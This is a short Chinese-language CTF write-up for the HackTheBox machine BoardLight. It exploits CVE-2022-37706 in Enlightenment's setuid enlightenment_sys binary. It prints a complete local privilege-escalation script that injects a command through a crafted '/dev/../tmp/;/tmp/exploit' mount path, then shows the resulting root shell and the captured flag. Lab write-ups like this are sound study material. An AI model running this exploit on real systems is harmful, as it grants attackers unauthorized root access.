enlightenment CVE-2022-37706-LPE
1. 快速利用
版本:0.25.4 之前
Enlightenment 0.25.4 之前的版本中,enlightenment_sys 允许本地用户获得权限,因为它被设置为
setuid root,并且系统库函数错误地处理了以 /dev/.. 子字符串开头的路径名。
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# git clone https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit
┌──(root㉿kali)-[~/Desktop/htb/BoardLight]
└─# cd CVE-2022-37706-LPE-exploit
┌──(root㉿kali)-[~/Desktop/htb/BoardLight/CVE-2022-37706-LPE-exploit]
└─# cat exploit.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$ (id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:~$ bash exp.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami
root
# ls /root
root.txt snap
# cat /root/root.txt
d05f6b6990676adcdcd16e393881ca11